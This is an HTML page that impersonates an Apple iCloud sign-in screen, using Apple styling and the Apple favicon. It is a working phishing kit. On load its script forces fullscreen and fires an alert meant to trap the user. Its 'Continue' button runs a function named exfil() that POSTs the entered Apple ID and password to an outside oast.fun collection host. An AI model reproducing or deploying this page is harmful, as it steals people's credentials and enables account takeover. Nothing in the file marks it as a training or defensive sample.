<!DOCTYPE html>
<html>
<head>
  <title>iCloud Login</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <style>
    html, body {
      margin: 0; padding: 0;
      background: white;
      font-family: -apple-system, BlinkMacSystemFont;
      height: 100%;
      display: flex;
      justify-content: center;
      align-items: center;
      flex-direction: column;
    }
    input {
      margin-top: 10px;
      font-size: 18px;
      padding: 10px;
      width: 80%;
      border-radius: 8px;
      border: 1px solid #ccc;
    }
    button {
      margin-top: 20px;
      padding: 10px 20px;
      font-size: 18px;
      border-radius: 10px;
      background-color: #0071e3;
      color: white;
      border: none;
    }
  </style>
</head>
<body>
  <img src="https://www.apple.com/favicon.ico" width="60" />
  <h2>Apple ID Required</h2>
  <p>Sign in to continue using iCloud.</p>
  <input type="email" placeholder="Apple ID" id="email" />
  <input type="password" placeholder="Password" id="pass" />
  <button onclick="exfil()">Continue</button>

  <script>
    document.documentElement.requestFullscreen().then(() => {
      setTimeout(() => alert(""), 100); // Lock gesture layer
    });

    function exfil() {
      fetch("https://jqdfjiuzmdhhkipzoaxxf2ocrw07i3cw7.oast.fun", {
        method: "POST",
        body: JSON.stringify({
          email: document.getElementById('email').value,
          pass: document.getElementById('pass').value
        }),
        mode: "no-cors"
      });
    }
  </script>
</body>
</html>
